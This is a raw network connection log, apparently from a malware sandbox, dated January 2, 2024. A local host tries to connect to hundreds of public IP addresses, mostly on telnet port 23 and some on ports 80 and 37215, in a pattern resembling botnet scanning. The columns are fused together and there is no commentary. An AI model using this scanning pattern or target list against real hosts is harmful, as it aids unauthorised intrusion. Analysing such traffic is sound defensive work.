                                                          Jan 2, 2024 06:23:51.200906992 CET1426523192.168.2.23113.240.171.101
                                                          Jan 2, 2024 06:23:51.200918913 CET1426523192.168.2.23195.248.40.96
                                                          Jan 2, 2024 06:23:51.200918913 CET1426523192.168.2.23144.115.106.63
                                                          Jan 2, 2024 06:23:51.200920105 CET1426523192.168.2.2380.202.76.44
                                                          Jan 2, 2024 06:23:51.200920105 CET1426523192.168.2.23218.137.112.236
                                                          Jan 2, 2024 06:23:51.200928926 CET1426523192.168.2.2357.70.229.101
                                                          Jan 2, 2024 06:23:51.200936079 CET1426523192.168.2.23212.166.198.251
                                                          Jan 2, 2024 06:23:51.200938940 CET1426523192.168.2.2392.168.233.6
                                                          Jan 2, 2024 06:23:51.200939894 CET1426523192.168.2.23182.94.219.228
                                                          Jan 2, 2024 06:23:51.200961113 CET1426523192.168.2.23143.171.30.22
                                                          Jan 2, 2024 06:23:51.200963020 CET1426523192.168.2.23148.193.231.100
                                                          Jan 2, 2024 06:23:51.200967073 CET1426523192.168.2.2327.198.27.5
                                                          Jan 2, 2024 06:23:51.200970888 CET1426523192.168.2.2397.18.61.211
                                                          Jan 2, 2024 06:23:51.200972080 CET1426523192.168.2.23198.194.166.17
                                                          Jan 2, 2024 06:23:51.200995922 CET1426523192.168.2.2364.242.212.30
                                                          Jan 2, 2024 06:23:51.200998068 CET1426523192.168.2.23219.198.6.50
                                                          Jan 2, 2024 06:23:51.200998068 CET1426523192.168.2.2358.188.102.107
                                                          Jan 2, 2024 06:23:51.200998068 CET1426523192.168.2.2340.32.30.40
                                                          Jan 2, 2024 06:23:51.200998068 CET1426523192.168.2.23123.124.67.86
                                                          Jan 2, 2024 06:23:51.200999975 CET1426523192.168.2.2337.227.160.106
                                                          Jan 2, 2024 06:23:51.201001883 CET1426523192.168.2.23182.237.244.17
                                                          Jan 2, 2024 06:23:51.201004028 CET1426523192.168.2.2312.150.27.226
                                                          Jan 2, 2024 06:23:51.201004028 CET1426523192.168.2.2371.11.250.13
                                                          Jan 2, 2024 06:23:51.201024055 CET1426523192.168.2.2318.46.252.28
                                                          Jan 2, 2024 06:23:51.201033115 CET1426523192.168.2.23178.240.45.246
                                                          Jan 2, 2024 06:23:51.201033115 CET1426523192.168.2.2362.100.31.199
                                                          Jan 2, 2024 06:23:51.201033115 CET1426523192.168.2.23129.95.155.62
                                                          Jan 2, 2024 06:23:51.201033115 CET1426523192.168.2.2371.157.132.179
                                                          Jan 2, 2024 06:23:51.201035976 CET1426523192.168.2.2393.192.111.67
                                                          Jan 2, 2024 06:23:51.201035976 CET1426523192.168.2.2344.224.209.56
                                                          Jan 2, 2024 06:23:51.201035976 CET1426523192.168.2.23137.253.46.228
                                                          Jan 2, 2024 06:23:51.201035976 CET1426523192.168.2.23109.117.240.164
                                                          Jan 2, 2024 06:23:51.201040983 CET1426523192.168.2.23151.14.249.68
                                                          Jan 2, 2024 06:23:51.201040983 CET1426523192.168.2.2362.133.173.102
                                                          Jan 2, 2024 06:23:51.201047897 CET1426523192.168.2.2373.234.68.163
                                                          Jan 2, 2024 06:23:51.201047897 CET1426523192.168.2.2348.244.59.29
                                                          Jan 2, 2024 06:23:51.201064110 CET1426523192.168.2.23140.12.44.145
                                                          Jan 2, 2024 06:23:51.201071024 CET1426523192.168.2.2354.79.158.38
                                                          Jan 2, 2024 06:23:51.201071024 CET1426523192.168.2.23125.202.231.148
                                                          Jan 2, 2024 06:23:51.201073885 CET1426523192.168.2.23201.75.127.106
                                                          Jan 2, 2024 06:23:51.201080084 CET1426523192.168.2.2378.106.134.38
                                                          Jan 2, 2024 06:23:51.201091051 CET1426523192.168.2.2348.141.187.30
                                                          Jan 2, 2024 06:23:51.201092005 CET1426523192.168.2.23108.67.197.64
                                                          Jan 2, 2024 06:23:51.201100111 CET1426523192.168.2.23104.26.245.89
                                                          Jan 2, 2024 06:23:51.201100111 CET1426523192.168.2.23209.150.8.66
                                                          Jan 2, 2024 06:23:51.201102972 CET1426523192.168.2.23128.216.61.205
                                                          Jan 2, 2024 06:23:51.201108932 CET1426523192.168.2.23211.92.112.118
                                                          Jan 2, 2024 06:23:51.201108932 CET1426523192.168.2.23105.35.190.66
                                                          Jan 2, 2024 06:23:51.201122999 CET1426523192.168.2.23196.184.74.66
                                                          Jan 2, 2024 06:23:51.201122999 CET1426523192.168.2.23182.9.105.247
                                                          Jan 2, 2024 06:23:51.201122999 CET1426523192.168.2.2390.51.178.181
                                                          Jan 2, 2024 06:23:51.201134920 CET1426523192.168.2.2346.168.149.176
                                                          Jan 2, 2024 06:23:51.201138973 CET1426523192.168.2.2376.121.222.28
                                                          Jan 2, 2024 06:23:51.201142073 CET1426523192.168.2.2345.161.108.11
                                                          Jan 2, 2024 06:23:51.201142073 CET1426523192.168.2.23148.230.193.127
                                                          Jan 2, 2024 06:23:51.201155901 CET1426523192.168.2.23220.180.4.86
                                                          Jan 2, 2024 06:23:51.201158047 CET1426523192.168.2.2327.227.70.97
                                                          Jan 2, 2024 06:23:51.201159954 CET1426523192.168.2.2349.49.116.35
                                                          Jan 2, 2024 06:23:51.201159954 CET1426523192.168.2.2382.155.36.16
                                                          Jan 2, 2024 06:23:51.201169014 CET1426523192.168.2.234.189.237.236
                                                          Jan 2, 2024 06:23:51.201175928 CET1426523192.168.2.23105.40.210.129
                                                          Jan 2, 2024 06:23:51.201175928 CET1426523192.168.2.2358.114.155.117
                                                          Jan 2, 2024 06:23:51.201176882 CET1426523192.168.2.23147.155.159.249
                                                          Jan 2, 2024 06:23:51.201178074 CET1426523192.168.2.2363.253.28.226
                                                          Jan 2, 2024 06:23:51.201186895 CET1426523192.168.2.2351.11.42.111
                                                          Jan 2, 2024 06:23:51.201195002 CET1426523192.168.2.23216.172.172.237
                                                          Jan 2, 2024 06:23:51.201200962 CET1426523192.168.2.2361.100.229.63
                                                          Jan 2, 2024 06:23:51.201204062 CET1426523192.168.2.2318.155.184.186
                                                          Jan 2, 2024 06:23:51.201204062 CET1426523192.168.2.23144.246.239.3
                                                          Jan 2, 2024 06:23:51.201210976 CET1426523192.168.2.23102.221.118.252
                                                          Jan 2, 2024 06:23:51.201224089 CET1426523192.168.2.2372.252.205.46
                                                          Jan 2, 2024 06:23:51.201226950 CET1426523192.168.2.23172.160.179.95
                                                          Jan 2, 2024 06:23:51.201231956 CET1426523192.168.2.2372.214.40.210
                                                          Jan 2, 2024 06:23:51.201236963 CET1426523192.168.2.2393.220.159.35
                                                          Jan 2, 2024 06:23:51.201246977 CET1426523192.168.2.23151.200.129.147
                                                          Jan 2, 2024 06:23:51.201247931 CET1426523192.168.2.23139.203.200.22
                                                          Jan 2, 2024 06:23:51.201260090 CET1426523192.168.2.23164.24.143.119
                                                          Jan 2, 2024 06:23:51.201260090 CET1426523192.168.2.23156.175.31.76
                                                          Jan 2, 2024 06:23:51.201265097 CET1426523192.168.2.2372.80.230.24
                                                          Jan 2, 2024 06:23:51.201271057 CET1426523192.168.2.231.97.106.95
                                                          Jan 2, 2024 06:23:51.201275110 CET1426523192.168.2.23209.18.80.60
                                                          Jan 2, 2024 06:23:51.201281071 CET1426523192.168.2.23187.6.213.96
                                                          Jan 2, 2024 06:23:51.201282978 CET1426523192.168.2.23190.228.223.14
                                                          Jan 2, 2024 06:23:51.201282978 CET1426523192.168.2.23145.139.232.64
                                                          Jan 2, 2024 06:23:51.201282978 CET1426523192.168.2.23170.117.32.87
                                                          Jan 2, 2024 06:23:51.201282978 CET1426523192.168.2.23177.211.169.143
                                                          Jan 2, 2024 06:23:51.201284885 CET1426523192.168.2.2392.199.146.104
                                                          Jan 2, 2024 06:23:51.201286077 CET1426523192.168.2.2342.51.167.214
                                                          Jan 2, 2024 06:23:51.201289892 CET1426523192.168.2.23104.34.157.241
                                                          Jan 2, 2024 06:23:51.201309919 CET1426523192.168.2.23140.242.33.167
                                                          Jan 2, 2024 06:23:51.201311111 CET1426523192.168.2.23171.220.79.2
                                                          Jan 2, 2024 06:23:51.201313019 CET1426523192.168.2.23164.118.187.67
                                                          Jan 2, 2024 06:23:51.201313019 CET1426523192.168.2.23212.104.110.106
                                                          Jan 2, 2024 06:23:51.201316118 CET1426523192.168.2.23161.192.232.218
                                                          Jan 2, 2024 06:23:51.201317072 CET1426523192.168.2.23172.86.112.187
                                                          Jan 2, 2024 06:23:51.201317072 CET1426523192.168.2.231.193.51.173
                                                          Jan 2, 2024 06:23:51.201324940 CET1426523192.168.2.23219.80.243.0
                                                          Jan 2, 2024 06:23:51.201342106 CET1426523192.168.2.23140.158.78.209
                                                          Jan 2, 2024 06:23:51.201343060 CET1426523192.168.2.23223.88.96.2
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.2339.178.83.248
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.2384.57.49.232
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.2378.237.57.204
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.23187.244.210.116
                                                          Jan 2, 2024 06:23:51.201344967 CET1426523192.168.2.23200.131.216.178
                                                          Jan 2, 2024 06:23:51.201344967 CET1426523192.168.2.2323.102.96.70
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.23195.209.123.191
                                                          Jan 2, 2024 06:23:51.201344967 CET1426523192.168.2.23109.151.75.13
                                                          Jan 2, 2024 06:23:51.201344967 CET1426523192.168.2.2366.146.249.146
                                                          Jan 2, 2024 06:23:51.201344013 CET1426523192.168.2.23121.93.102.90
                                                          Jan 2, 2024 06:23:51.201347113 CET1426523192.168.2.23172.34.70.31
                                                          Jan 2, 2024 06:23:51.201349020 CET1426523192.168.2.23110.224.201.90
                                                          Jan 2, 2024 06:23:51.201349020 CET1426523192.168.2.2377.170.194.110
                                                          Jan 2, 2024 06:23:51.201349020 CET1426523192.168.2.23148.51.171.141
                                                          Jan 2, 2024 06:23:51.201349020 CET1426523192.168.2.235.123.65.7
                                                          Jan 2, 2024 06:23:51.201351881 CET1426523192.168.2.23129.119.246.67
                                                          Jan 2, 2024 06:23:51.201351881 CET1426523192.168.2.2384.56.125.29
                                                          Jan 2, 2024 06:23:51.201351881 CET1426523192.168.2.23219.118.237.246
                                                          Jan 2, 2024 06:23:51.201347113 CET1426523192.168.2.2389.11.109.193
                                                          Jan 2, 2024 06:23:51.201347113 CET1426523192.168.2.2383.29.21.98
                                                          Jan 2, 2024 06:23:51.201347113 CET1426523192.168.2.23165.67.201.32
                                                          Jan 2, 2024 06:23:51.201364040 CET1426523192.168.2.23118.127.74.173
                                                          Jan 2, 2024 06:23:51.201364040 CET1426523192.168.2.2349.46.217.188
                                                          Jan 2, 2024 06:23:51.201364040 CET1426523192.168.2.23194.81.215.67
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.2349.245.219.55
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.2389.139.113.237
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.2327.76.165.207
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.23219.53.239.204
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.23222.99.152.15
                                                          Jan 2, 2024 06:23:51.201370955 CET1426523192.168.2.23153.71.241.131
                                                          Jan 2, 2024 06:23:51.201374054 CET1426523192.168.2.23182.230.253.156
                                                          Jan 2, 2024 06:23:51.201374054 CET1426523192.168.2.23114.91.176.203
                                                          Jan 2, 2024 06:23:51.201376915 CET1426523192.168.2.2376.102.110.170
                                                          Jan 2, 2024 06:23:51.201376915 CET1426523192.168.2.23170.25.183.212
                                                          Jan 2, 2024 06:23:51.201389074 CET1426523192.168.2.2324.54.211.91
                                                          Jan 2, 2024 06:23:51.201389074 CET1426523192.168.2.23141.14.96.188
                                                          Jan 2, 2024 06:23:51.201389074 CET1426523192.168.2.2345.253.4.114
                                                          Jan 2, 2024 06:23:51.201397896 CET1426523192.168.2.239.116.215.64
                                                          Jan 2, 2024 06:23:51.201397896 CET1426523192.168.2.23186.176.97.198
                                                          Jan 2, 2024 06:23:51.201397896 CET1426523192.168.2.23152.128.251.205
                                                          Jan 2, 2024 06:23:51.201399088 CET1426523192.168.2.23136.3.65.248
                                                          Jan 2, 2024 06:23:51.201399088 CET1426523192.168.2.23207.125.172.217
                                                          Jan 2, 2024 06:23:51.201399088 CET1426523192.168.2.2353.185.3.213
                                                          Jan 2, 2024 06:23:51.201399088 CET1426523192.168.2.23157.67.128.151
                                                          Jan 2, 2024 06:23:51.201409101 CET1426523192.168.2.23103.88.122.50
                                                          Jan 2, 2024 06:23:51.201420069 CET1426523192.168.2.23135.17.96.219
                                                          Jan 2, 2024 06:23:51.201421976 CET1426523192.168.2.23151.194.16.96
                                                          Jan 2, 2024 06:23:51.201421976 CET1426523192.168.2.23180.70.187.74
                                                          Jan 2, 2024 06:23:51.201421976 CET1426523192.168.2.23180.0.62.105
                                                          Jan 2, 2024 06:23:51.201421976 CET1426523192.168.2.23217.253.177.123
                                                          Jan 2, 2024 06:23:51.201425076 CET1426523192.168.2.2314.109.212.37
                                                          Jan 2, 2024 06:23:51.201426029 CET1426523192.168.2.2376.5.116.111
                                                          Jan 2, 2024 06:23:51.201426983 CET1426523192.168.2.23217.131.140.237
                                                          Jan 2, 2024 06:23:51.201426983 CET1426523192.168.2.23117.253.120.223
                                                          Jan 2, 2024 06:23:51.201426983 CET1426523192.168.2.23165.164.148.223
                                                          Jan 2, 2024 06:23:51.201426983 CET1426523192.168.2.2353.217.199.244
                                                          Jan 2, 2024 06:23:51.201428890 CET1426523192.168.2.23190.234.98.168
                                                          Jan 2, 2024 06:23:51.201421976 CET1426523192.168.2.23143.120.49.7
                                                          Jan 2, 2024 06:23:51.201431036 CET1426523192.168.2.2385.43.5.15
                                                          Jan 2, 2024 06:23:51.201442003 CET1426523192.168.2.2348.74.63.94
                                                          Jan 2, 2024 06:23:51.201447010 CET1426523192.168.2.2358.4.73.110
                                                          Jan 2, 2024 06:23:51.201452017 CET1426523192.168.2.2370.65.187.62
                                                          Jan 2, 2024 06:23:51.201462984 CET1426523192.168.2.23112.136.141.166
                                                          Jan 2, 2024 06:23:51.201467991 CET1426523192.168.2.23172.244.236.226
                                                          Jan 2, 2024 06:23:51.201467991 CET1426523192.168.2.2396.105.16.248
                                                          Jan 2, 2024 06:23:51.201467991 CET1426523192.168.2.2399.38.168.68
                                                          Jan 2, 2024 06:23:51.201467991 CET1426523192.168.2.2399.91.227.98
                                                          Jan 2, 2024 06:23:51.201471090 CET1426523192.168.2.23134.250.182.181
                                                          Jan 2, 2024 06:23:51.201471090 CET1426523192.168.2.23108.26.44.231
                                                          Jan 2, 2024 06:23:51.201473951 CET1426523192.168.2.23168.184.136.214
                                                          Jan 2, 2024 06:23:51.201473951 CET1426523192.168.2.23192.56.23.163
                                                          Jan 2, 2024 06:23:51.201476097 CET1426523192.168.2.2331.79.230.134
                                                          Jan 2, 2024 06:23:51.201477051 CET1426523192.168.2.23125.76.16.197
                                                          Jan 2, 2024 06:23:51.201488972 CET1426523192.168.2.2377.117.41.220
                                                          Jan 2, 2024 06:23:51.201488972 CET1426523192.168.2.23108.249.207.153
                                                          Jan 2, 2024 06:23:51.201491117 CET1426523192.168.2.23189.86.18.196
                                                          Jan 2, 2024 06:23:51.201492071 CET1426523192.168.2.2312.27.221.61
                                                          Jan 2, 2024 06:23:51.201498985 CET1426523192.168.2.23122.195.223.46
                                                          Jan 2, 2024 06:23:51.201498985 CET1426523192.168.2.23133.22.55.71
                                                          Jan 2, 2024 06:23:51.201503038 CET1426523192.168.2.23223.13.119.225
                                                          Jan 2, 2024 06:23:51.201503038 CET1426523192.168.2.2360.56.233.51
                                                          Jan 2, 2024 06:23:51.201512098 CET1426523192.168.2.23192.100.188.129
                                                          Jan 2, 2024 06:23:51.201514959 CET1426523192.168.2.23158.231.101.108
                                                          Jan 2, 2024 06:23:51.201522112 CET1426523192.168.2.2353.178.53.225
                                                          Jan 2, 2024 06:23:51.201522112 CET1426523192.168.2.23114.36.2.59
                                                          Jan 2, 2024 06:23:51.201529026 CET1426523192.168.2.23145.177.41.158
                                                          Jan 2, 2024 06:23:51.201529980 CET1426523192.168.2.2358.178.32.170
                                                          Jan 2, 2024 06:23:51.201595068 CET3668023192.168.2.2390.117.50.182
                                                          Jan 2, 2024 06:23:51.201608896 CET5191223192.168.2.2349.232.101.104
                                                          Jan 2, 2024 06:23:51.217958927 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.217958927 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.217962980 CET4520623192.168.2.23182.253.187.98
                                                          Jan 2, 2024 06:23:51.217966080 CET6055080192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.217966080 CET5522880192.168.2.23220.134.218.248
                                                          Jan 2, 2024 06:23:51.249967098 CET4851237215192.168.2.23156.241.14.153
                                                          Jan 2, 2024 06:23:51.249968052 CET5171237215192.168.2.23156.247.18.93
                                                          Jan 2, 2024 06:23:51.325351954 CET2314265172.65.204.212192.168.2.23
                                                          Jan 2, 2024 06:23:51.325417995 CET1426523192.168.2.23172.65.204.212
                                                          Jan 2, 2024 06:23:51.343686104 CET2314265216.172.172.237192.168.2.23
                                                          Jan 2, 2024 06:23:51.361049891 CET806050267.212.162.83192.168.2.23
                                                          Jan 2, 2024 06:23:51.361095905 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.361129045 CET3383280192.168.2.2366.22.55.129
                                                          Jan 2, 2024 06:23:51.361140966 CET5304080192.168.2.2338.55.173.244
                                                          Jan 2, 2024 06:23:51.361149073 CET3638280192.168.2.23173.61.119.77
                                                          Jan 2, 2024 06:23:51.361167908 CET6099080192.168.2.23159.69.20.60
                                                          Jan 2, 2024 06:23:51.361185074 CET4809480192.168.2.235.133.222.136
                                                          Jan 2, 2024 06:23:51.361207008 CET4695680192.168.2.23160.121.60.205
                                                          Jan 2, 2024 06:23:51.361229897 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.361229897 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.361265898 CET6058880192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.372334003 CET804246463.195.193.240192.168.2.23
                                                          Jan 2, 2024 06:23:51.372385979 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.372397900 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.372397900 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.372414112 CET4255080192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.391182899 CET8060550104.107.28.16192.168.2.23
                                                          Jan 2, 2024 06:23:51.391227961 CET6055080192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.391247988 CET6055080192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.391247988 CET6055080192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.391263962 CET6063680192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.409971952 CET3406637215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:51.429678917 CET231426579.171.84.253192.168.2.23
                                                          Jan 2, 2024 06:23:51.437309027 CET2314265176.126.112.73192.168.2.23
                                                          Jan 2, 2024 06:23:51.456207037 CET2314265162.19.152.13192.168.2.23
                                                          Jan 2, 2024 06:23:51.458651066 CET2314265210.132.175.66192.168.2.23
                                                          Jan 2, 2024 06:23:51.459021091 CET231426537.222.56.238192.168.2.23
                                                          Jan 2, 2024 06:23:51.463186979 CET231426558.188.102.107192.168.2.23
                                                          Jan 2, 2024 06:23:51.474107027 CET233668090.117.50.182192.168.2.23
                                                          Jan 2, 2024 06:23:51.474179983 CET3668023192.168.2.2390.117.50.182
                                                          Jan 2, 2024 06:23:51.474327087 CET4856823192.168.2.23172.65.204.212
                                                          Jan 2, 2024 06:23:51.475758076 CET2314265133.165.188.249192.168.2.23
                                                          Jan 2, 2024 06:23:51.491489887 CET2314265180.152.89.150192.168.2.23
                                                          Jan 2, 2024 06:23:51.504235029 CET806050267.212.162.83192.168.2.23
                                                          Jan 2, 2024 06:23:51.504483938 CET806050267.212.162.83192.168.2.23
                                                          Jan 2, 2024 06:23:51.504494905 CET806050267.212.162.83192.168.2.23
                                                          Jan 2, 2024 06:23:51.504501104 CET806058867.212.162.83192.168.2.23
                                                          Jan 2, 2024 06:23:51.504538059 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.504550934 CET6050280192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.504559994 CET6058880192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.504599094 CET6058880192.168.2.2367.212.162.83
                                                          Jan 2, 2024 06:23:51.505964041 CET803383266.22.55.129192.168.2.23
                                                          Jan 2, 2024 06:23:51.506002903 CET3383280192.168.2.2366.22.55.129
                                                          Jan 2, 2024 06:23:51.506025076 CET3383280192.168.2.2366.22.55.129
                                                          Jan 2, 2024 06:23:51.506025076 CET3383280192.168.2.2366.22.55.129
                                                          Jan 2, 2024 06:23:51.506051064 CET3385280192.168.2.2366.22.55.129
                                                          Jan 2, 2024 06:23:51.508675098 CET8055228220.134.218.248192.168.2.23
                                                          Jan 2, 2024 06:23:51.508718014 CET5522880192.168.2.23220.134.218.248
                                                          Jan 2, 2024 06:23:51.508732080 CET5522880192.168.2.23220.134.218.248
                                                          Jan 2, 2024 06:23:51.508747101 CET5522880192.168.2.23220.134.218.248
                                                          Jan 2, 2024 06:23:51.508765936 CET5531880192.168.2.23220.134.218.248
                                                          Jan 2, 2024 06:23:51.511959076 CET805304038.55.173.244192.168.2.23
                                                          Jan 2, 2024 06:23:51.512000084 CET5304080192.168.2.2338.55.173.244
                                                          Jan 2, 2024 06:23:51.512012959 CET5304080192.168.2.2338.55.173.244
                                                          Jan 2, 2024 06:23:51.512012959 CET5304080192.168.2.2338.55.173.244
                                                          Jan 2, 2024 06:23:51.512034893 CET5306280192.168.2.2338.55.173.244
                                                          Jan 2, 2024 06:23:51.523942947 CET23142652.140.171.15192.168.2.23
                                                          Jan 2, 2024 06:23:51.525016069 CET231426591.196.35.247192.168.2.23
                                                          Jan 2, 2024 06:23:51.525666952 CET235191249.232.101.104192.168.2.23
                                                          Jan 2, 2024 06:23:51.525703907 CET5191223192.168.2.2349.232.101.104
                                                          Jan 2, 2024 06:23:51.527247906 CET804246463.195.193.240192.168.2.23
                                                          Jan 2, 2024 06:23:51.527343988 CET804255063.195.193.240192.168.2.23
                                                          Jan 2, 2024 06:23:51.527359962 CET804246463.195.193.240192.168.2.23
                                                          Jan 2, 2024 06:23:51.527369976 CET804246463.195.193.240192.168.2.23
                                                          Jan 2, 2024 06:23:51.527400970 CET4255080192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.527400970 CET4255080192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.527403116 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.527403116 CET4246480192.168.2.2363.195.193.240
                                                          Jan 2, 2024 06:23:51.528949976 CET8036382173.61.119.77192.168.2.23
                                                          Jan 2, 2024 06:23:51.528983116 CET3638280192.168.2.23173.61.119.77
                                                          Jan 2, 2024 06:23:51.529010057 CET3638280192.168.2.23173.61.119.77
                                                          Jan 2, 2024 06:23:51.529010057 CET3638280192.168.2.23173.61.119.77
                                                          Jan 2, 2024 06:23:51.529028893 CET3640480192.168.2.23173.61.119.77
                                                          Jan 2, 2024 06:23:51.552788973 CET8060636104.107.28.16192.168.2.23
                                                          Jan 2, 2024 06:23:51.552856922 CET6063680192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.552856922 CET6063680192.168.2.23104.107.28.16
                                                          Jan 2, 2024 06:23:51.552870035 CET1837780192.168.2.2365.16.15.191
                                                          Jan 2, 2024 06:23:51.552875996 CET1837780192.168.2.23213.234.217.149
                                                          Jan 2, 2024 06:23:51.552881956 CET1837780192.168.2.23145.123.87.188
                                                          Jan 2, 2024 06:23:51.552900076 CET1837780192.168.2.2346.109.74.204
                                                          Jan 2, 2024 06:23:51.552901030 CET1837780192.168.2.23206.174.66.95
                                                          Jan 2, 2024 06:23:51.552903891 CET1837780192.168.2.2325.115.153.171
                                                          Jan 2, 2024 06:23:51.552910089 CET1837780192.168.2.238.202.234.207
                                                          Jan 2, 2024 06:23:51.552925110 CET1837780192.168.2.2382.235.65.185
                                                          Jan 2, 2024 06:23:51.552922964 CET1837780192.168.2.234.87.216.149
                                                          Jan 2, 2024 06:23:51.552928925 CET1837780192.168.2.23108.37.196.54
                                                          Jan 2, 2024 06:23:51.552936077 CET1837780192.168.2.23152.53.126.101
                                                          Jan 2, 2024 06:23:51.552946091 CET1837780192.168.2.23156.88.141.234
                                                          Jan 2, 2024 06:23:51.552949905 CET1837780192.168.2.2352.17.238.184
                                                          Jan 2, 2024 06:23:51.552952051 CET1837780192.168.2.2325.226.237.41
                                                          Jan 2, 2024 06:23:51.552958012 CET1837780192.168.2.2347.160.43.109
                                                          Jan 2, 2024 06:23:51.552958965 CET1837780192.168.2.23102.245.96.44
                                                          Jan 2, 2024 06:23:51.552969933 CET1837780192.168.2.23221.204.205.212
                                                          Jan 2, 2024 06:23:51.552968979 CET1837780192.168.2.23104.32.192.87
                                                          Jan 2, 2024 06:23:51.552984953 CET1837780192.168.2.23122.163.206.173
                                                          Jan 2, 2024 06:23:51.552989960 CET1837780192.168.2.23132.27.140.155
                                                          Jan 2, 2024 06:23:51.552994013 CET1837780192.168.2.2381.94.146.172
                                                          Jan 2, 2024 06:23:51.552998066 CET1837780192.168.2.23154.21.126.1
                                                          Jan 2, 2024 06:23:51.552998066 CET1837780192.168.2.23125.55.195.25
                                                          Jan 2, 2024 06:23:51.553009033 CET1837780192.168.2.23152.63.30.27
                                                          Jan 2, 2024 06:23:51.553008080 CET1837780192.168.2.2348.196.78.176
                                                          Jan 2, 2024 06:23:51.553008080 CET1837780192.168.2.23172.88.10.135
                                                          Jan 2, 2024 06:23:51.553015947 CET1837780192.168.2.23177.193.185.60
                                                          Jan 2, 2024 06:23:51.553018093 CET1837780192.168.2.2339.71.138.211
                                                          Jan 2, 2024 06:23:51.553033113 CET1837780192.168.2.23140.174.119.180
                                                          Jan 2, 2024 06:23:51.553033113 CET1837780192.168.2.2365.101.148.221
                                                          Jan 2, 2024 06:23:51.553035021 CET1837780192.168.2.23189.49.106.86
                                                          Jan 2, 2024 06:23:51.553035021 CET1837780192.168.2.2352.15.193.7
                                                          Jan 2, 2024 06:23:51.553075075 CET1837780192.168.2.23146.251.156.118
                                                          Jan 2, 2024 06:23:51.553078890 CET1837780192.168.2.23195.128.164.41
                                                          Jan 2, 2024 06:23:51.553078890 CET1837780192.168.2.2331.145.247.210
                                                          Jan 2, 2024 06:23:51.553078890 CET1837780192.168.2.23202.111.57.166
                                                          Jan 2, 2024 06:23:51.553081036 CET1837780192.168.2.2349.202.190.199
                                                          Jan 2, 2024 06:23:51.553081036 CET1837780192.168.2.23166.116.186.71
                                                          Jan 2, 2024 06:23:51.553111076 CET1837780192.168.2.23129.183.34.128
                                                          Jan 2, 2024 06:23:51.553111076 CET1837780192.168.2.2386.14.165.28
                                                          Jan 2, 2024 06:23:51.553111076 CET1837780192.168.2.23150.152.65.86
                                                          Jan 2, 2024 06:23:51.553113937 CET1837780192.168.2.2347.188.26.90
                                                          Jan 2, 2024 06:23:51.553113937 CET1837780192.168.2.23149.57.79.102
                                                          Jan 2, 2024 06:23:51.553117037 CET1837780192.168.2.2398.233.113.88
                                                          Jan 2, 2024 06:23:51.553117037 CET1837780192.168.2.2393.35.247.24
                                                          Jan 2, 2024 06:23:51.553117990 CET1837780192.168.2.23108.115.102.172
                                                          Jan 2, 2024 06:23:51.553119898 CET1837780192.168.2.2395.142.96.165
                                                          Jan 2, 2024 06:23:51.553121090 CET1837780192.168.2.23115.192.25.150
                                                          Jan 2, 2024 06:23:51.553121090 CET1837780192.168.2.23132.253.59.6
                                                          Jan 2, 2024 06:23:51.553122997 CET1837780192.168.2.23212.235.171.204
                                                          Jan 2, 2024 06:23:51.553128958 CET1837780192.168.2.23108.186.216.181
                                                          Jan 2, 2024 06:23:51.553131104 CET1837780192.168.2.23182.37.173.9
                                                          Jan 2, 2024 06:23:51.553133011 CET1837780192.168.2.23128.157.60.187
                                                          Jan 2, 2024 06:23:51.553152084 CET1837780192.168.2.23118.37.39.233
                                                          Jan 2, 2024 06:23:51.553154945 CET1837780192.168.2.23110.89.187.45
                                                          Jan 2, 2024 06:23:51.553154945 CET1837780192.168.2.2364.18.221.98
                                                          Jan 2, 2024 06:23:51.553157091 CET1837780192.168.2.23149.171.39.84
                                                          Jan 2, 2024 06:23:51.553160906 CET1837780192.168.2.23198.6.109.71
                                                          Jan 2, 2024 06:23:51.553160906 CET1837780192.168.2.23120.118.163.16
                                                          Jan 2, 2024 06:23:51.553162098 CET1837780192.168.2.235.255.49.150
                                                          Jan 2, 2024 06:23:51.553162098 CET1837780192.168.2.23135.17.120.77
                                                          Jan 2, 2024 06:23:51.553162098 CET1837780192.168.2.23220.245.80.65
                                                          Jan 2, 2024 06:23:51.553169012 CET1837780192.168.2.2385.71.20.60
                                                          Jan 2, 2024 06:23:51.553174973 CET1837780192.168.2.2314.191.31.195
                                                          Jan 2, 2024 06:23:51.553177118 CET1837780192.168.2.2381.128.198.14
                                                          Jan 2, 2024 06:23:51.553188086 CET1837780192.168.2.23162.233.75.255
                                                          Jan 2, 2024 06:23:51.553189039 CET1837780192.168.2.234.244.181.184
